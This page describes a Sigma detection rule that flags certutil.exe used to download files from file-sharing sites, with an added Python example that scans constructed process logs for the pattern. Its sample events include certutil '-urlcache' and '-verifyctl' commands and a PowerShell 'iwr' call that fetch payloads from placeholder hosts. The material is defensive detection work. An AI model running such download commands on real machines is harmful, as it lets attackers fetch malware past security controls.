Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Sigma Rules

Summary
This rule identifies suspicious use of the Windows command-line utility `certutil.exe`, a legitimate tool for certificate management. It targets executions of `certutil.exe` whose command-line arguments enable downloading a file from commonly abused file-sharing websites. Attackers favour `certutil` for this because it is a signed, built-in system binary and therefore lets them fetch payloads while bypassing controls that would block an unknown downloader. The detection logic checks for execution of `certutil.exe` together with the specific command-line flags that indicate a file download, and for a URL that matches a predefined list of file-sharing domains commonly used in phishing and malware distribution campaigns.
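The following is an added example, not part of the Sigma rule or this page, that implements the same three-part check (certutil image, a download flag, a file-sharing host in the URL) over constructed process-creation log lines. The domain list (`share.example`, `paste.example`, `transfer.example`) and the flag list are assumptions standing in for the rule's own predefined values, which this page does not reproduce; the `Image="..." CommandLine="..."` line format is likewise a constructed stand-in for a real process-creation event.

```python
import re

# Assumption: placeholder file-sharing domains; the real rule carries its own list.
FILE_SHARING_DOMAINS = ("share.example", "paste.example", "transfer.example")

# Assumption: certutil switches that cause a URL to be fetched; the page does not
# name the exact flags the rule matches on.
DOWNLOAD_FLAGS = ("urlcache", "verifyctl")

# Hostname of any http(s) URL found in a command line.
URL_RE = re.compile(r"""https?://([^/\s"']+)""", re.IGNORECASE)
# key="value" pairs of the constructed event format; handles escaped quotes.
FIELD_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')


def parse_event(line):
    """Turn one constructed key="value" log line into a dict of fields."""
    return {k: v.replace('\\"', '"') for k, v in FIELD_RE.findall(line)}


def is_certutil(image):
    """Match the process image regardless of drive, directory or letter case."""
    return image.lower().endswith("\\certutil.exe")


def has_download_flag(cmd):
    """True if any download-capable certutil switch appears in the command line."""
    low = cmd.lower()
    return any(flag in low for flag in DOWNLOAD_FLAGS)


def url_hosts(cmd):
    """All lower-cased hostnames referenced by URLs in the command line."""
    return [h.lower() for h in URL_RE.findall(cmd)]


def hits_file_sharing_domain(cmd):
    """Exact or subdomain match against the domain list (no substring matching,
    so share.example.evil.test does not count as share.example)."""
    return any(
        h == d or h.endswith("." + d)
        for h in url_hosts(cmd)
        for d in FILE_SHARING_DOMAINS
    )


def matches_rule(event):
    """All three conditions must hold, mirroring the rule's AND logic."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    return is_certutil(image) and has_download_flag(cmd) and hits_file_sharing_domain(cmd)


def scan(lines):
    """Return the parsed events that trigger the rule."""
    return [e for e in map(parse_event, lines) if matches_rule(e)]


# Constructed sample events: two should alert, three should not.
SAMPLE_LOG = [
    r'Image="C:\Windows\System32\certutil.exe" CommandLine="certutil -urlcache -split -f https://share.example/f/abc payload.dat"',
    r'Image="C:\Windows\System32\certutil.exe" CommandLine="certutil -urlcache -split -f https://updates.corp.example/patch.cab patch.cab"',
    r'Image="C:\Windows\System32\certutil.exe" CommandLine="certutil -hashfile C:\temp\file.exe SHA256"',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -c iwr https://share.example/f/abc"',
    r'Image="C:\Windows\SysWOW64\CertUtil.exe" CommandLine="CertUtil.exe -verifyctl -f -split http://PASTE.example/raw/xyz"',
]

if __name__ == "__main__":
    for event in scan(SAMPLE_LOG):
        print("ALERT:", event["Image"], "|", event["CommandLine"])
```

The second sample line shows why the domain list matters: a `-urlcache` download from an internal update server is the same certutil behaviour but is not what this rule is meant to fire on, so it stays quiet. The last line shows the case-insensitive image and host handling that a real rule also needs.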
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2023-02-15